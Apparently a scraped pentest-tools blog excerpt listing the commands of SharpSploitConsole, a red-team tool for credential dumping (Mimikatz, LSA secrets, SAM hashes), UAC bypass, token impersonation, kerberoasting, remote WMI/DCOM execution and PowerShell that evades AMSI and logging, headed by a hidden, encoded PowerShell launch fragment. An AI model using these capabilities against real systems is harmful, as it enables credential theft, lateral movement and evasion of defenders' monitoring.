-noP -sta -w 1 -enc <Base64>Currently available options (more to come)Interact : Starts interactive console mode, if you are interacting remotely you may not want to use this optionMimi-All : Executes everything but DCSync, requires adminMimi-Command : Executes a chosen Mimikatz commandlogonPasswords : Runs privilege::debug sekurlsa::logonPasswordsLsaCache : Retrieve Domain Cached Credentials hashes from registryLsaSecrets : Retrieve LSA secrets stored in registrySamDump : Retrieve password hashes from the SAM databaseWdigest : Retrieve Wdigest credentials from registrywhoami : Retrieve current userGetSystem : Impersonate system user, requires admin rightsImpersonate : Impersonate the token of a specified process, requires pid – command requires admin rights.BypassUAC : Bypass UAC, requires binary | command | path to binary – requires admin rightsRevertToSelf : Ends the impersonation of any token, reverts back to initial token associated with current processCurrentDirectory : Retrieve current working directoryDirectoryListing : Retrieve current directory listingChangeDirectory : Changes the current directory by appending a specified string to the current working directoryHostname : Retrieve hostnameProcessList : Retrieve list of running processesProcDump : Creates a minidump of the memory of a running process, requires PID | output location | output name – requires adminUsername : Retrieve current usernameReadRegistry : Retrieve registry path value, requires full path argumentWriteRegistry : Write to registry, requires full path argument | valueNetLocalGroupMembers : Retrieve users of local group remotely, requires computername | groupname | username | passwordNetLocalGroups : Retrieve local groups remotely, requires computername | username | passwordNetLoggedOnUsers : Retrieve current logged on users remotely, requires computername | username | passwordNetSessions : Retrieve user sessions remotely, requires computername | username | passwordPing : Ping systems, requires computernames"PortScan : Port scan systems, requires computername | portsGetDomainUsers : Grabs specified (or all) user objects in the target domain, by default will use current user contextGetDomainGroups : Grabs specified (or all) group objects in the target domain, by default will use current user contextGetDomainComputers : Grabs specified (or all) computer objects in the target domain, by default will use current user contextKerberoast : Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user contextWMI : Run command remotely via WMI, requires computername | username | password | command | requires adminDCOM : Run command remotely via DCOM, requires computername | command | directory | params – requires adminShell : Run a shell commandPowershell : Runs a powershell command while attempting to bypass AMSI, scriptBlock logging, and Module loggingDownload SharpSploitConsole

Link: http://feedproxy.google.com/~r/PentestTools/~3/kATTdJ2komM/sharpsploitconsole-console-application.html